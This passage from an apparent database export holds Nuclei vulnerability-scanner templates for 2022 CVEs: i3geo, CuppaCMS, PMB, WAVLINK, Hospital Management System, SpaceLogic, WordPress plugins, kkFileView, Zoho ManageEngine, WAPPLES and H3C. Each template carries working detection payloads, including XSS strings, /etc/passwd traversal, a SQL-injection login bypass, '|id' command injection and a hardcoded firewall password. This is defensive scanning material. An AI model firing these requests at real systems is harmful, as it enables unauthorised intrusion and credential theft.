vulnerability via request_token.php.\n reference:\n - https://github.com/edmarmoretti/i3geo/issues/5\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34094\n - https://owasp.org/www-community/attacks/xss/\n - https://softwarepublico.gov.br/social/i3geo\n - https://github.com/wagnerdracha/ProofOfConcept\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34094\n cwe-id: CWE-79\n epss-score: 0.00266\n epss-percentile: 0.65533\n cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: softwarepublico\n product: i3geo\n tags: cve2022,cve,i3geo,xss,softwarepublico\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")'\n condition: and\n# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950", "hash": "1f48690c07e665875da59bd6caafc420", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308557" }, "name": "CVE-2022-34121.yaml", "content": "id: CVE-2022-34121\n\ninfo:\n name: CuppaCMS v1.0 - Local File Inclusion\n author: edoardottt\n severity: high\n description: |\n Cuppa CMS v1.0 is vulnerable to local file inclusion via the url POST parameter of /templates/default/html/windows/right.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.\n reference:\n - 
https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates\n - https://github.com/CuppaCMS/CuppaCMS/issues/18\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34121\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34121\n cwe-id: CWE-829\n epss-score: 0.66943\n epss-percentile: 0.97855\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,cms,cuppacms\n\nhttp:\n - raw:\n - |\n POST /templates/default/html/windows/right.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=../../../../../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950", "hash": "dd5885333b38e613cc53b57577bd1b6f", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308558" }, "name": "CVE-2022-34328.yaml", "content": "id: CVE-2022-34328\n\ninfo:\n name: PMB 7.3.10 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of PMB.\n reference:\n - 
https://github.com/jenaye/PMB/blob/main/README.md\n - https://github.com/jenaye/PMB\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34328\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34328\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36967\n cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sigb\n product: pmb\n shodan-query: http.html:\"PMB Group\"\n tags: cve,cve2022,pmb,xss,pmb_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"' target='cart_info\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206bde39b421fc0dbe953ff2bb4c4414dd18a118d11c1854e21a49bfefa62df3f2022009445f47a0e787a6922487a2834e6903d60e5f80936db25397d553943d744fc0:922c64590222798bb761d5b6d8e72950", "hash": "ed55ffd301c6cfbb8f04ce480f6d5a34", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308559" }, "name": "CVE-2022-34576.yaml", "content": "id: CVE-2022-34576\n\ninfo:\n name: WAVLINK WN535 G3 - Improper Access Control\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. 
An unauthenticated GET request to /cgi-bin/ExportAllSettings.sh returns the device's full settings export, including the administrator login and password (the Login=, Password=, Model= and AuthMode= fields this template matches on). This is an information-disclosure issue (CVSS C:H/I:N/A:N), not code execution; the leaked credentials can then be used to log in, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34576\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/tr3ss/gofetch\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34576\n epss-score: 0.03075\n epss-percentile: 0.90796\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Login='\n - 'Password='\n - 'Model='\n - 'AuthMode='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950", "hash": "57de1bde38436dd00af72bdab5390d56", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855a" }, "name": "CVE-2022-34590.yaml", "content": "id: CVE-2022-34590\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Hospital 
Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. Note that this template does not exercise editid: it submits the payload admin' or '1'='1'# in the username and password fields of the unauthenticated admin login form at /hms/admin/ and treats the admin dashboard being returned as a positive result, so a match demonstrates an authentication bypass rather than the PR:H scenario in the recorded CVSS vector.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34590\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-34590\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.86269\n cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hospital_management_system_project\n product: hospital_management_system\n shodan-query: http.html:\"Hospital Management System\"\n tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project\n\nhttp:\n - raw:\n - |\n POST /hms/admin/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Admin | Dashboard'\n - 'Manage Patients'\n - 'Manage Doctors'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950", "hash": "28371998ab59b2c3ff57edd6c6650ff1", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855b" }, "name": "CVE-2022-34753.yaml", "content": "id: CVE-2022-34753\n\ninfo:\n name: SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution\n author: gy741\n severity: high\n description: |\n SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to OS command injection (CWE-78) via the name parameter of /delsnap.pl, which is passed to a shell without neutralizing special elements. Exploitation requires valid HTTP Basic credentials for the web interface (CVSS PR:L; this template authenticates with {{username}}:{{password}}), after which the attacker can execute arbitrary commands, reported as running as root in the referenced advisory, to deploy malware, obtain sensitive information, modify data, and/or gain full control of the device.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability.\n reference:\n - https://www.zeroscience.mk/codes/SpaceLogic.txt\n - https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf\n - http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34753\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-34753\n cwe-id: CWE-78\n epss-score: 0.96923\n epss-percentile: 0.99698\n cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: schneider-electric\n product: 
spacelogic_c-bus_home_controller_firmware\n shodan-query: html:\"SpaceLogic C-Bus\"\n tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric\n\nhttp:\n - raw:\n - |\n GET /delsnap.pl?name=|id HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950", "hash": "b8fcea435496c47210456aad342e797b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855c" }, "name": "CVE-2022-3484.yaml", "content": "id: CVE-2022-3484\n\ninfo:\n name: WordPress WPB Show Core - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress wpb-show-core plugin (affected version range not recorded in this template; see the WPScan reference) contains a reflected cross-site scripting vulnerability in the fileList[0][title] parameter of modules/jplayer_new/jplayer_twitter_ver_1.php. The plugin does not sanitize and escape the parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.\n remediation: |\n Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3484\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3484\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45981\n cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpb_show_core_project\n product: wpb_show_core\n framework: wordpress\n google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php\n tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"wpb_jplayer_setting\")'\n - 'contains(body, \"\")'\n condition: and\n# digest: 490a0046304402201a749cdffd411187ddb33010e8f5216620153b04b07fa73fc4fc631a83f40fb2022002510fd3818a0349b4e36bb35d207c52445a1777f8df6d4ef0baf5cb38af6080:922c64590222798bb761d5b6d8e72950", "hash": "b8fee392db83e22600136f624ab6fc23", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855d" }, "name": "CVE-2022-3506.yaml", "content": "id: CVE-2022-3506\n\ninfo:\n name: 
WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability.\n reference:\n - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/\n - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828\n - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3506\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-3506\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48543\n cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: never5\n product: related_posts\n framework: wordpress\n tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n - |\n GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(header_4, 'text/html')\"\n - \"status_code_4 == 200\"\n - 'contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")'\n - \"contains(body_4, 'The amount of automatically')\"\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-z]+)\" />'\n internal: true\n part: body\n# digest: 490a004630440220183c07929c3a6fa76dbd9ae9c9682952d3b03b59c1ff34cf40687d299cfb671b022070f05c9efb0883a2b4afd38a695f1868ab9b6e7d4d0a3356e1fc0e8be2a02643:922c64590222798bb761d5b6d8e72950", "hash": "70023d1b646a25ba18059d20a084a2f8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855e" }, "name": "CVE-2022-35151.yaml", "content": "id: CVE-2022-35151\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n impact: |\n Successful exploitation 
of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/366\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35151\n - https://github.com/StarCrossPortal/scalpel\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/youcans896768/APIV_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35151\n cwe-id: CWE-79\n epss-score: 0.02148\n epss-percentile: 0.8906\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,xss,kkfileview,keking\n\nhttp:\n - raw:\n - |\n GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '图片预览'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950", "hash": "6adae51317f11133423343bda994456e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855f" }, "name": "CVE-2022-35405.yaml", "content": "id: CVE-2022-35405\n\ninfo:\n name: Zoho ManageEngine - Remote Code Execution\n author: viniciuspereiras,true13\n severity: critical\n description: |\n Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are 
susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability.\n reference:\n - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb\n - https://xz.aliyun.com/t/11578\n - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html\n - https://www.bigous.me/2022/09/06/CVE-2022-35405.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35405\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-35405\n cwe-id: CWE-502\n epss-score: 0.97471\n epss-percentile: 0.99962\n cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_access_manager_plus\n shodan-query: http.title:\"ManageEngine\"\n tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp\n\nhttp:\n - method: POST\n path:\n - \"{{RootURL}}/xmlrpc\"\n\n body: |\n {{randstr}}big0us\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"faultString\"\n\n - type: word\n part: body\n words:\n - \"No such service [{{randstr}}]\"\n - \"No such handler: {{randstr}}\"\n condition: or\n\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: or\n# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950", "hash": "7fbe3f4e9bc468d464006629b91abcba", "level": 6, 
"time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308560" }, "name": "CVE-2022-35413.yaml", "content": "id: CVE-2022-35413\n\ninfo:\n name: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials\n author: For3stCo1d\n severity: critical\n description: |\n WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall.\n remediation: |\n Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability.\n reference:\n - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413\n - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35413\n - https://www.pentasecurity.com/product/wapples/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-35413\n cwe-id: CWE-798\n epss-score: 0.72077\n epss-percentile: 0.97989\n cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: pentasecurity\n product: wapples\n shodan-query: http.title:\"Intelligent WAPPLES\"\n tags: cve,cve2022,wapples,firewall,default-login,pentasecurity\n\nhttp:\n - raw:\n - |\n POST /webapi/auth HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
id={{username}}&password={{password}}\n\n payloads:\n username:\n - systemi\n password:\n - db/wp.no1\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"res_msg\":\"Authentication Success.\"'\n - '\"doc_id\":\"user_systemi\"'\n condition: and\n\n - type: word\n part: header\n words:\n - WP_SESSID=\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950", "hash": "f311c047d0a4c95354e98918f5db9f6c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308561" }, "name": "CVE-2022-35416.yaml", "content": "id: CVE-2022-35416\n\ninfo:\n name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting\n author: 0x240x23elu\n severity: medium\n description: |\n H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.\n reference:\n - https://github.com/advisories/GHSA-9x76-78gc-r3m9\n - https://github.com/Docker-droid/H3C_SSL_VPN_XSS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35416\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/bughunter0xff/recon-scanner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35416\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36353\n cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: h3c\n product: 
ssl_vpn\n shodan-query: http.html_hash:510586239\n tags: cve,cve2022,xss,vpn,h3c\n\nhttp:\n - raw:\n - |\n GET /wnm/login/login.json HTTP/1.1\n Host: {{Hostname}}\n Cookie: svpnlang=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950", "hash": "a8e27b35ad095853417ef096570b9c63", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308562" }, "name": "CVE-2022-35493.yaml", "content": "id: CVE-2022-35493\n\ninfo:\n name: eShop 3.0.4 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-35493\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-35493\n cwe-id: CWE-79\n epss-score: 0.00157\n epss-percentile: 0.52174\n cpe: 
